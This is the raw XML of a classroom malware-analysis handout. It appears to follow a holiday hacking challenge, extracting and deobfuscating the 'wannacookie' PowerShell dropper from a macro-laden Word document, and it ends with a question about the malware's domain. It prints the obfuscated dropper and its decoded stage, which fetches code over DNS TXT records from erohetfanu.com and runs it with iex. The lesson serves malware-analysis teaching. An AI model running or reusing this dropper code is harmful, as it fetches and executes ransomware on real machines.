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8C5D73" w14:textId="77777777" w:rsidR="006744E4" w:rsidRDefault="006744E4" w:rsidP="006744E4">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objective--Identify the Domain </w:t>
      </w:r>
      <w:r w:rsidRPr="000324D5">
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">(Part </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000324D5">
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE9DACC" w14:textId="77777777" w:rsidR="006744E4" w:rsidRDefault="006744E4" w:rsidP="006744E4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Extracting the malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B8BAA" w14:textId="77777777" w:rsidR="004A3478" w:rsidRDefault="006744E4" w:rsidP="006744E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This follows </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="006744E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Chris Davis’ presentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> almost exactly.</w:t>
      </w:r>
      <w:r w:rsidR="00396531">
        <w:t xml:space="preserve">  Remember to do this in a safe VM!  After extracting the Word document from the zip file and installing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00396531" w:rsidRPr="00396531">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>oletools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00396531">
        <w:t xml:space="preserve">, we just run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00396531" w:rsidRPr="00396531">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>olevba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00396531">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="00396531" w:rsidRPr="00396531">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CHOCOLATE_CHIP_COOKIE_RECIPE.docm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A9E481" w14:textId="77777777" w:rsidR="00396531" w:rsidRDefault="00396531" w:rsidP="006744E4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55506C6C" wp14:editId="095C3EC8">
            <wp:extent cx="5943600" cy="3116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653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E14670" wp14:editId="075810FB">
            <wp:extent cx="5943600" cy="3077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0A59" w14:textId="78641294" w:rsidR="00396531" w:rsidRDefault="00396531" w:rsidP="006744E4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using Chris’ </w:t>
      </w:r>
      <w:r w:rsidR="00CF5EF8">
        <w:t>technique,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we</w:t>
      </w:r>
      <w:r w:rsidR="00883E42">
        <w:t xml:space="preserve"> copy the dropper into PowerShell,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> remove the </w:t>
      </w:r>
      <w:r w:rsidR="00CF5EF8">
        <w:t xml:space="preserve">switches </w:t>
      </w:r>
      <w:r w:rsidR="00883E42">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00CF5EF8">
        <w:t xml:space="preserve"> hide execution</w:t>
      </w:r>
      <w:r w:rsidR="00883E42">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CF5EF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B50987">
        <w:t xml:space="preserve">remove </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B50987" w:rsidRPr="00B50987">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>iex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B50987">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00CF5EF8">
        <w:t>and repair the quotes.</w:t>
      </w:r>
      <w:r w:rsidR="00CF5EF8">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CF5EF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58901BF0" wp14:editId="2B8CAD37">
            <wp:extent cx="5943600" cy="67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B7DF" w14:textId="77777777" w:rsidR="00CF5EF8" w:rsidRPr="00CF5EF8" w:rsidRDefault="00CF5EF8" w:rsidP="00CF5EF8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PS C:\Users\John\Desktop&gt; powershell.exe -C "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> a New-Object; (a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IO.StreamReader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">((a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IO.Compression.DeflateStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IO.Me</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="585FC10C" w14:textId="77777777" w:rsidR="00CF5EF8" w:rsidRPr="00CF5EF8" w:rsidRDefault="00CF5EF8" w:rsidP="00CF5EF8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>moryStream][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Convert]::FromBase64String('lVHRSsMwFP2VSwksYUtoWkxxY4iyir4oaB+EMUYoqQ1syUjToXT7d2/1Zb4pF5JDzuGce2+a3tXRegcP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7DDDCC" w14:textId="77777777" w:rsidR="00CF5EF8" w:rsidRPr="00CF5EF8" w:rsidRDefault="00CF5EF8" w:rsidP="00CF5EF8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2S0lmsFA/AKIBt4ddjbChArBJnCCGxiAbOEMiBsfSl23MKzrVocNXdfeHU2Im/k8euuiVJRsZ1Ixdr5UEw9LwGOKRucFBBP74PABMWmQSopCSVViSZWre6w7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B2BF4A" w14:textId="77777777" w:rsidR="00CF5EF8" w:rsidRPr="00CF5EF8" w:rsidRDefault="00CF5EF8" w:rsidP="00CF5EF8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>da2uslKt8C6zskiLPJcJyttRjgC9zehNiQXrIBXispnKP7qYZ5S+mM7vjoavXPek9wb4qwmoARN8a2KjXS9qvwf+TSakEb+JBHj1eTBQvVVMdDFY997NQKaM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B614E2D" w14:textId="77777777" w:rsidR="00CF5EF8" w:rsidRPr="00CF5EF8" w:rsidRDefault="00CF5EF8" w:rsidP="00CF5EF8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SzZurIXpEv4bYsWfcnA51nxQQvGDxrlP8NxH/kMy9gXREohG'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>),[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F00FB74" w14:textId="77777777" w:rsidR="00396531" w:rsidRPr="00CF5EF8" w:rsidRDefault="00CF5EF8" w:rsidP="00CF5EF8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ReadToEnd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BB4238" w14:textId="77777777" w:rsidR="00CF5EF8" w:rsidRDefault="00CF5EF8" w:rsidP="00CF5EF8"/>
    <w:p w14:paraId="31E83736" w14:textId="77777777" w:rsidR="00CF5EF8" w:rsidRDefault="00CF5EF8" w:rsidP="00CF5EF8">
      <w:r>
        <w:t>This gives us some code that we can read.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EDDE774" wp14:editId="32052A21">
            <wp:extent cx="5943600" cy="54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AD66E" w14:textId="77777777" w:rsidR="00CF5EF8" w:rsidRPr="00CF5EF8" w:rsidRDefault="00CF5EF8" w:rsidP="00CF5EF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">function H2A($a) {$o; $a -split '(..)' </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> { $_ }  | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> {[char]([convert]::toint16($_,16))} | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> {$o = $o + $_}; return $o}; $f = "77616E6E61636F6F6B69652E6D696E2E707331"; $h = ""; foreach ($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> in 0..([convert]::ToInt32((Resolve-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DnsName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Server erohetfanu.com -Name "$f.erohetfanu.com" -Type TXT).strings, 10)-1)) {$h += (Resolve-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DnsName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Server erohetfanu.com -Name "$i.$f.erohetfanu.com" -Type TXT).strings}; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF5EF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>($(H2A $h | Out-string))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320FC33" w14:textId="4FF596C5" w:rsidR="00F909FE" w:rsidRDefault="00F909FE" w:rsidP="00CF5EF8">
      <w:r>
        <w:t>We can make the code more readable by putting it into ISE and tinkering with it.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B50987">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BA5D22B" wp14:editId="437C83DA">
            <wp:extent cx="4895850" cy="2257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F9E3" w14:textId="502001D3" w:rsidR="00B83788" w:rsidRDefault="00F909FE" w:rsidP="00B83788">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is interesting.  That long string, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>77616E6E61636F6F6B69652E6D696E2E707331</w:t>
      </w:r>
      <w:r w:rsidRPr="00F909FE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>is the same string we saw in the DNS traffic for the Snort terminal</w:t>
      </w:r>
      <w:r w:rsidR="00B83788">
        <w:t xml:space="preserve">.  The domain erohet.fanu.com is serving the malware, but we don’t know if it is communicating with the malware yet.  The malware file we get here is going to be </w:t>
      </w:r>
      <w:r w:rsidR="002D242C">
        <w:t>the same</w:t>
      </w:r>
      <w:r w:rsidR="00B83788">
        <w:t xml:space="preserve"> as the file we got when we used tshark to extract the TXT fields from DNS.</w:t>
      </w:r>
      <w:r w:rsidR="00883E42">
        <w:t xml:space="preserve">  It is good to know </w:t>
      </w:r>
      <w:r w:rsidR="00883E42">
        <w:lastRenderedPageBreak/>
        <w:t>that the packet capture files and the malicious Word document are the same attack; if they were two separate attacks, we would have much more work to do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118A05F" w14:textId="5E661276" w:rsidR="00883E42" w:rsidRDefault="00883E42" w:rsidP="00B83788">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Start a Wireshark packet capture and then execute the dropper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBA2645" w14:textId="6D8A0B93" w:rsidR="00CF5EF8" w:rsidRDefault="008D4F0D" w:rsidP="00CF5EF8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>When d</w:t>
      </w:r>
      <w:r w:rsidR="00B83788">
        <w:t>ropper.ps1 is executing,</w:t>
      </w:r>
      <w:r w:rsidR="00883E42">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00B83788">
        <w:t xml:space="preserve"> we see </w:t>
      </w:r>
      <w:r w:rsidR="00946EDC">
        <w:t>an identical pattern to the Snort packet capture file.</w:t>
      </w:r>
      <w:r w:rsidR="00946EDC" w:rsidRPr="00946EDC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00946EDC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46213F05" wp14:editId="047B7444">
            <wp:extent cx="5543550" cy="2385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1058" cy="239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16BC" w14:textId="77777777" w:rsidR="00245343" w:rsidRDefault="00245343" w:rsidP="00CF5EF8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The result is the same ugly code as before.  One note:  If you replace all semicolons with </w:t>
      </w:r>
      <w:r w:rsidR="002D242C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>new lines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> as Chris did in his talk, some old fashioned FOR loops in the code will need to be repaired.  Also, if you </w:t>
      </w:r>
      <w:r w:rsidR="002D242C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>do the search/replace in Visual Code and use \n, you will need to have Use Regular Expression selected.</w:t>
      </w:r>
      <w:r w:rsidR="002D242C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002D242C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F281931" wp14:editId="105B2107">
            <wp:extent cx="5943600" cy="1132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F2E8" w14:textId="3D651D08" w:rsidR="002D242C" w:rsidRDefault="002D242C" w:rsidP="00CF5EF8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Cleaning the code was tedius, and it turns out that CounterHack has given us a way to avoid cleaning.</w:t>
      </w:r>
      <w:r w:rsidR="00D80913">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">  The string we saw above is </w:t>
      </w:r>
      <w:r w:rsidR="00D80913" w:rsidRPr="008D4F0D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:t>wannacookie.min.ps1</w:t>
      </w:r>
      <w:r w:rsidR="00D80913">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> in ASCII.  What happens if we remove the “.min” from the string and use </w:t>
      </w:r>
      <w:r w:rsidR="00D80913" w:rsidRPr="00D80913">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00D80913" w:rsidRPr="008D4F0D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:t>77616E6E61636F6F6B69652E707331</w:t>
      </w:r>
      <w:r w:rsidR="00D80913" w:rsidRPr="00D80913">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="008D4F0D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidR="008D4F0D" w:rsidRPr="008D4F0D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:t>wannacookie.ps1</w:t>
      </w:r>
      <w:r w:rsidR="00D80913">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> instead?  Changing the dropper.ps1 code is simple.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A6221" w14:textId="7C03838C" w:rsidR="00D80913" w:rsidRDefault="00B50987" w:rsidP="00CF5EF8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DDA8C4B" wp14:editId="32FCA05A">
            <wp:extent cx="4514850" cy="21347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9055" cy="214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638081" w14:textId="77777777" w:rsidR="00245343" w:rsidRDefault="00D80913" w:rsidP="00CF5EF8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Much better!  The variable names are expanded as well.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68AC7703" wp14:editId="3B5EA35A">
            <wp:extent cx="5943600" cy="2458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99A6" w14:textId="77777777" w:rsidR="0013432F" w:rsidRDefault="0013432F" w:rsidP="0013432F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Hand in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40244567" w14:textId="77777777" w:rsidR="0013432F" w:rsidRDefault="0013432F" w:rsidP="0013432F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80913">
        <w:t>At this point it should be easy to determine the name of the domain this malware communicates with.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  What is it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8760ED" w14:textId="77777777" w:rsidR="0013432F" w:rsidRDefault="0013432F" w:rsidP="0013432F"/>
    <w:p w14:paraId="469E3C23" w14:textId="77777777" w:rsidR="0013432F" w:rsidRDefault="0013432F" w:rsidP="0013432F"/>
    <w:p w14:paraId="3F75F4F7" w14:textId="77777777" w:rsidR="0013432F" w:rsidRDefault="0013432F" w:rsidP="0013432F"/>
